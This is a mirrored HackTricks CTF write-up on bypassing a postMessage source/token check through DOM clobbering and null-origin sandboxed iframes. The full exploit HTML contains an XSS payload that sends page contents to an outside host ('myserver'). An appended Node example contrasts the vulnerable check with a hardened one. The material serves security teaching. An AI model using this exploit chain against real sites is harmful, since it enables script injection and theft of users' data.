mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
Bypassing SOP with Iframes - 2
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Iframes in SOP-2
In the solution for this challenge, @Strellic_ proposes a similar method to the previous section. Let's check it.
In this challenge the attacker needs to bypass this:
```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
```
If he does, he can send a postMessage with HTML content that is going to be written into the page with innerHTML without sanitization (XSS).
The way to bypass the first check is by making window.calc.contentWindow undefined and e.source null:
- window.calc.contentWindow is actually document.getElementById("calc"). You can clobber document.getElementById with <img name=getElementById /> (note that the Sanitizer API is not configured to protect against DOM clobbering attacks in its default state).
  - Therefore, you can clobber document.getElementById("calc") with <img name=getElementById /><div id=calc></div>. Then window.calc will be undefined.
- Now we need e.source to be undefined or null (because == is used instead of ===, null == undefined is true). Getting this is "easy": if you create an iframe, send a postMessage from it and immediately remove the iframe, e.origin is going to be null. Check the following code:
```html
<iframe id="myIframe" src="https://example.com"></iframe>
<script>
  // Post a message through the iframe's window and remove the iframe
  // straight away, before the message event is delivered.
  const iframe = document.getElementById("myIframe");
  iframe.contentWindow.postMessage("Hello", "*");
  iframe.remove();
</script>
```
```javascript
// Run from the DevTools console (top-level await) on the attacker's page.
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
// send the message from the iframe's window, then remove the iframe
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); // e.origin === null
```
To bypass the second check about the token, send token with the value null and make the value of window.token undefined:
- Sending token in the postMessage with value null is trivial.
- window.token is set by calling the function getCookie, which uses document.cookie. Note that any access to document.cookie in null-origin pages triggers an error. This makes window.token have the value undefined.
The final solution by @terjanq is the following:
```html
<html>
<body>
<script>
    // Abuse "expr" param to cause a HTML injection and
    // clobber document.getElementById and make window.calc.contentWindow undefined
    open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

    function start(){
        var ifr = document.createElement('iframe');
        // Create a sandboxed iframe, as sandboxed iframes will have origin null
        // this null origin will document.cookie trigger an error and window.token will be undefined
        ifr.sandbox = 'allow-scripts allow-popups';
        ifr.srcdoc = `<script>(${hack})()<\/script>`

        document.body.appendChild(ifr);

        function hack(){
            var win = open('https://obligatory-calc.ctf.sekai.team');
            setTimeout(()=>{
                parent.postMessage('remove', '*');
                // this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
                // token=null equals to undefined and e.source will be null so null == undefined
                win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
            },1000);
        }

        // this removes the iframe so e.source becomes null in postMessage event.
        onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
    }
    setTimeout(start, 1000);
</script>
</body>
</html>
```
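To see why the bypass works and what closes it, here is an added example (not code from the HackTricks page or from the challenge) that models the vulnerable postMessage check beside a hardened version. Browser `Window` and `MessageEvent` objects are replaced by plain objects so it runs under Node; `TRUSTED_ORIGIN`, `calcWindow` and the two scenario objects are constructed for illustration.

```javascript
// Added example, not code from the HackTricks page or from the challenge itself.
// It models the vulnerable postMessage check from the write-up beside a hardened
// version, using plain objects in place of browser Window/MessageEvent so it runs
// under Node. TRUSTED_ORIGIN, calcWindow and the scenario objects are constructed.

const TRUSTED_ORIGIN = "https://calc.example"; // assumed origin of the calc iframe
const calcWindow = { name: "calc-iframe" };    // stands in for the iframe's contentWindow

// Vulnerable check, as written in the challenge: window.calc is re-resolved through
// document.getElementById and both comparisons use loose equality.
function vulnerableCheck(e, win) {
  return e.source == win.calc.contentWindow && e.data.token == win.token;
}

// Hardened check: origin allow-list, strict identity against a reference captured
// at setup time (not looked up through the DOM, so clobbering cannot rewrite it),
// and typed comparisons that reject null/undefined on either side.
function hardenedCheck(e, trustedSource, expectedToken) {
  if (e.origin !== TRUSTED_ORIGIN) return false;
  if (e.source !== trustedSource) return false;
  if (typeof expectedToken !== "string" || expectedToken.length === 0) return false;
  if (!e.data || typeof e.data.token !== "string") return false;
  return e.data.token === expectedToken;
}

// Scenario 1 (constructed): the genuine iframe posts the real token.
const legitimateWindow = { calc: { contentWindow: calcWindow }, token: "s3cr3t" };
const legitimateEvent = { source: calcWindow, origin: TRUSTED_ORIGIN, data: { token: "s3cr3t" } };

// Scenario 2 (constructed): the state the write-up produces. document.getElementById
// was clobbered, so window.calc is an element with no contentWindow; getCookie threw
// in the null-origin page, so window.token is undefined; the sending iframe was removed
// before delivery, so e.source is null and e.origin is the string "null".
const clobberedWindow = { calc: { tagName: "FORM" }, token: undefined };
const spoofedEvent = { source: null, origin: "null", data: { token: null } };

// Scenario 3 (constructed): right origin and source, but a null token.
const nullTokenEvent = { source: calcWindow, origin: TRUSTED_ORIGIN, data: { token: null } };

function runScenarios() {
  return {
    legitVulnerable: vulnerableCheck(legitimateEvent, legitimateWindow),
    legitHardened: hardenedCheck(legitimateEvent, calcWindow, legitimateWindow.token),
    spoofVulnerable: vulnerableCheck(spoofedEvent, clobberedWindow),
    spoofHardened: hardenedCheck(spoofedEvent, calcWindow, clobberedWindow.token),
    nullTokenHardened: hardenedCheck(nullTokenEvent, calcWindow, undefined),
  };
}

console.log(runScenarios());
// { legitVulnerable: true, legitHardened: true, spoofVulnerable: true,
//   spoofHardened: false, nullTokenHardened: false }
```

The two changes that matter are the explicit `e.origin` allow-list (a message from a removed or sandboxed iframe carries the origin string `"null"`, which never matches a real origin) and comparing against a window reference captured when the iframe is created rather than one re-resolved through `document.getElementById` on every message. Switching `==` to `===` alone would not be enough, since `null === null` still holds when both the stored reference and the token have been nulled out.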